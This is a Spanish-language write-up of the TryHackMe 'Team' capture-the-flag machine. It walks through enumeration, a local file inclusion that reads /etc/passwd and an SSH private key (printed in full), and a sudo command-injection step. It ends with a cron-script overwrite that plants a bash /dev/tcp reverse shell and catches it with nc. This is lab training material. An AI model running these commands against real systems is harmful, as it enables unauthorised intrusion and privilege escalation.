> For the complete documentation index, see [llms.txt](https://enciall.gitbook.io/enciall/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://enciall.gitbook.io/enciall/ctf/try-hack-me/team.md).

# Team

|                       |                                                |
| --------------------- | ---------------------------------------------- |
| Nombre de la máquina: | Team                                           |
| Dificultad:           | Facil                                          |
| Plataforma:           | [tryhackme.com](https://tryhackme.com/)        |
| Creador:              | [dalemazza](https://tryhackme.com/p/dalemazza) |

### Iniciamos con un escaneo rápido para identificar los puertos abiertos:

```sh
nmap -p- --open -sS -sC -sV --min-rate 5000 -n -Pn 10.10.194.78
```

```bash
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-06 20:54 CST
Nmap scan report for 10.10.194.78
Host is up (0.21s latency).
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.5
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 32:f8:ac:17:0f:8d:3d:f8:22:58:c2:66:36:12:82:4b (RSA)
|   256 72:ec:39:75:5a:89:e4:5c:c4:30:75:61:02:b4:d3:57 (ECDSA)
|_  256 0f:6c:ee:0c:ba:be:2f:11:bc:6d:dc:fe:86:2c:01:9f (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works! If you see this add 'te...
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.09 seconds
```

si vamos al puerto 80 vemos que es un apache2 ubuntu

<figure><img src="/files/pLMXwc8jADLhsELc5jif" alt=""><figcaption></figcaption></figure>

vemos que es un apache2 default o no? si hacemos `Ctrl + u` vemos el codigo y vemos esto<br>

<figure><img src="/files/As5tWJcSAA4eQ78Xq92B" alt=""><figcaption></figcaption></figure>

nos dice que pongamos `team.thm` en el host asi que lo agregamos asi:

```sh
nano /etc/hosts
```

```
127.0.0.1       localhost
127.0.1.1       kali
IP-DE-LA-MAQUINA   team.thm
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
```

ahora si vamos a team.thm en el navegador nos encontramos esta web<br>

<figure><img src="/files/6Rrfg5So1pKSs94WNSH4" alt=""><figcaption></figcaption></figure>

ahora hacemos fuzzing para encontrar directorios ocultos

```sh
ffuf -u http://team.thm/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
```

```

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://team.thm/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Extensions       : .php .sh .py .txt 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

images                  [Status: 301, Size: 305, Words: 20, Lines: 10, Duration: 5202ms]
scripts                 [Status: 301, Size: 306, Words: 20, Lines: 10, Duration: 440ms]
assets                  [Status: 301, Size: 305, Words: 20, Lines: 10, Duration: 352ms]
robots.txt              [Status: 200, Size: 5, Words: 1, Lines: 2, Duration: 182ms]
```

vemos que tenemos una carpeta interesante llamada `scripts` pero no podemos acceder sin permiso asi que hacemos fuzzing otravez en busca de algo mas

```sh
ffuf -u http://team.thm/scripts/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .php,.sh,.py,.txt
```

```

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://team.thm/scripts/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Extensions       : .php .sh .py .txt 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

script.txt              [Status: 200, Size: 597, Words: 52, Lines: 22, Duration: 220ms]
```

vemos un script lo abrimos y vemos esto

```bash
#!/bin/bash
read -p "Enter Username: " REDACTED
read -sp "Enter Username Password: " REDACTED
echo
ftp_server="localhost"
ftp_username="$Username"
ftp_password="$Password"
mkdir /home/username/linux/source_folder
source_folder="/home/username/source_folder/"
cp -avr config* $source_folder
dest_folder="/home/username/linux/dest_folder/"
ftp -in $ftp_server <<END_SCRIPT
quote USER $ftp_username
quote PASS $decrypt
cd $source_folder
!cd $dest_folder
mget -R *
quit

# Updated version of the script
# Note to self had to change the extension of the old "script" in this folder, as it has creds in
```

vemos que es un archivo censurado pero nos dice algo de actualizar el script asi que buscaremos versiones antiguas del script&#x20;

```sh
ffuf -u http://team.thm/scripts/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .old  
```

```

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://team.thm/scripts/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Extensions       : .old 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

script.old              [Status: 200, Size: 466, Words: 27, Lines: 19, Duration: 190ms]
```

vemos el archivo con curl para no descargarlo

```sh
curl http://team.thm/scripts/script.old
```

```bash
#!/bin/bash
read -p "Enter Username: " XXXXXXX
read -sp "Enter Username Password: " XXXXXXXXX
echo
ftp_server="localhost"
ftp_username="$Username"
ftp_password="$Password"
mkdir /home/username/linux/source_folder
source_folder="/home/username/source_folder/"
cp -avr config* $source_folder
dest_folder="/home/username/linux/dest_folder/"
ftp -in $ftp_server <<END_SCRIPT
quote USER $ftp_username
quote PASS $decrypt
cd $source_folder
!cd $dest_folder
mget -R *
quit
```

vemos credenciales para FTP asi que las provamos

```sh
ftp 10.10.174.245
```

```bash
Connected to 10.10.174.245.
220 (vsFTPd 3.0.5)
Name (10.10.174.245:enciall): ftpuser
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxrwxr-x    2 65534    65534        4096 Jan 15  2021 workshare
226 Directory send OK.
ftp> 
```

aqui ponemos `passive` para que no tarde tanto en leer los archivos vemos que tenemos una carpeta llamada `workshare` asi que vamos ahí&#x20;

```bash
ftp> cd workshare
250 Directory successfully changed.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rwxr-xr-x    1 1002     1002          269 Jan 15  2021 New_site.txt
226 Directory send OK.
ftp> get New_site.txt
local: New_site.txt remote: New_site.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for New_site.txt (269 bytes).
100% |******************************************************************************************************************************************|   269      727.68 KiB/s    00:00 ETA
226 Transfer complete.
269 bytes received in 00:00 (1.42 KiB/s)
ftp> 
```

vemos un TXT asi que lo descargamos

```sh
cat New_site.txt
```

```
Dale
	I have started coding a new website in PHP for the team to use, this is currently under development. It can be
found at ".dev" within our domain.

Also as per the team policy please make a copy of your "id_rsa" and place this in the relevent config file.

Gyles 
```

nos da una pista de que tenemos un subdominio asi que vamos a /etc/hosts y ponemos lo siguiente&#x20;

```sh
nano /etc/hosts
```

```
127.0.0.1       localhost
127.0.1.1       kali
10.10.174.245   team.thm dev.team.thm
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
```

ahora vamos al subdominio

<figure><img src="/files/yAkueBAhZPbcYYTcWt0V" alt=""><figcaption></figcaption></figure>

vemos un mensaje y un link vemos que hay

<figure><img src="/files/ODPlOE8idd1b7YsD1eft" alt=""><figcaption></figcaption></figure>

vemos en la url un Local File Inclusion (LFI) investigando encontramos un clave privada para ssh en&#x20;

<figure><img src="/files/Jun9lVIdV3hVNIDbdOVV" alt=""><figcaption></figcaption></figure>

copiamos la clave:

{% code overflow="wrap" %}

```
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

```

{% endcode %}

creamos un archivo llamado id\_rsa y le damos permisos con chmod 600 id\_rsa, ahora necesitamos un usuario vamos a:

```sh
http://dev.team.thm/script.php?page=/etc/passwd
```

{% code overflow="wrap" %}

```
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false dale:x:1000:1000:anon,,,:/home/dale:/bin/bash gyles:x:1001:1001::/home/gyles:/bin/bash ftpuser:x:1002:1002::/home/ftpuser:/bin/sh ftp:x:110:116:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin sshd:x:111:65534::/run/sshd:/usr/sbin/nologin systemd-timesync:x:112:117:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin tss:x:113:120:TPM software stack,,,:/var/lib/tpm:/bin/false tcpdump:x:114:121::/nonexistent:/usr/sbin/nologin fwupd-refresh:x:115:122:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin usbmux:x:116:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin ssm-user:x:1003:1005::/home/ssm-user:/bin/sh ubuntu:x:1004:1007:Ubuntu:/home/ubuntu:/bin/bash 
```

{% endcode %}

vemos un usuario `dale` vamos a probarlo con ssh&#x20;

```sh
ssh -i id_rsa dale@10.10.174.245
```

```sh
Last login: Mon Jan 18 10:51:32 2021
dale@ip-10-10-174-245:~$ id
uid=1000(dale) gid=1000(dale) groups=1000(dale),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare),1003(editors)
dale@ip-10-10-174-245:~$ 
```

ahora hacemos sudo -l para ver que permisos tiene el usuario

```sh
dale@ip-10-10-174-245:~$ sudo -l
Matching Defaults entries for dale on ip-10-10-174-245:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dale may run the following commands on ip-10-10-174-245:
    (gyles) NOPASSWD: /home/gyles/admin_checks
dale@ip-10-10-174-245:~$ 
```

vemos que podemos ejecutar un archivo con el usuario gyles asi que ejecutamos&#x20;

```shell
sudo -u gyles /home/gyles/admin_checks
```

```bash
Reading stats.
Reading stats..
Enter name of person backing up the data: bash
Enter 'date' to timestamp the file: bash
The Date is bash
id
uid=1001(gyles) gid=1001(gyles) groups=1001(gyles),108(lxd),1003(editors),1004(admin)
```

ahora somos `gyles` pornemos esto para arreglar la tty operativa

```python
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

ahora tenemos la flag de usuario

```sh
gyles@ip-10-10-174-245:/home/dale$ ls
user.txt
gyles@ip-10-10-174-245:/home/dale$ cat user.txt 
THM{XXXXXXXXXXX}
gyles@ip-10-10-174-245:/home/dale$ 
```

&#x20;ahora haciendo sudo -l nos pide contraseña y como no la tenemos no podemos ver, investigando con pspy encontramos este script:

```sh
gyles@ip-10-10-174-245:/home/dale$ cd /opt
gyles@ip-10-10-174-245:/opt$ ls
admin_stuff
gyles@ip-10-10-174-245:/opt$ cd admin_stuff/
gyles@ip-10-10-174-245:/opt/admin_stuff$ ls
script.sh*
gyles@ip-10-10-174-245:/opt/admin_stuff$ cat script.sh 
#!/bin/bash
#I have set a cronjob to run this script every minute


dev_site="/usr/local/sbin/dev_backup.sh"
main_site="/usr/local/bin/main_backup.sh"
#Back ups the sites locally
$main_site
$dev_site
gyles@ip-10-10-174-245:/opt/admin_stuff$ 
```

ahora vemos cual podemos modificar:

```sh
gyles@ip-10-10-174-245:/opt/admin_stuff$ groups
gyles lxd editors admin
gyles@ip-10-10-174-245:/opt/admin_stuff$ ls -la /usr/local/sbin/dev_backup.sh
-rwxr-xr-x 1 root root 64 Jan 17  2021 /usr/local/sbin/dev_backup.sh
gyles@ip-10-10-174-245:/opt/admin_stuff$ ls -la /usr/local/bin/main_backup.sh
-rwxrwxr-x 1 root admin 65 Jan 17  2021 /usr/local/bin/main_backup.sh
gyles@ip-10-10-174-245:/opt/admin_stuff$ 
```

ahora ponemos:<br>

```sh
echo 'bash -i >& /dev/tcp/TU-IP/445 0>&1' > /usr/local/bin/main_backup.sh
```

ahora&#x20;

```sh
nc -nlvp 445
```

en unos segundos seremos root

```bash
listening on [any] 445 ...
connect to [10.2.18.141] from (UNKNOWN) [10.10.174.245] 51692
bash: cannot set terminal process group (4485): Inappropriate ioctl for device
bash: no job control in this shell
root@ip-10-10-174-245:~# ls
ls
root.txt
snap
root@ip-10-10-174-245:~# cat roo	
cat root.txt 
THM{XXXXXXXXXXXX}
root@ip-10-10-174-245:~# 
```
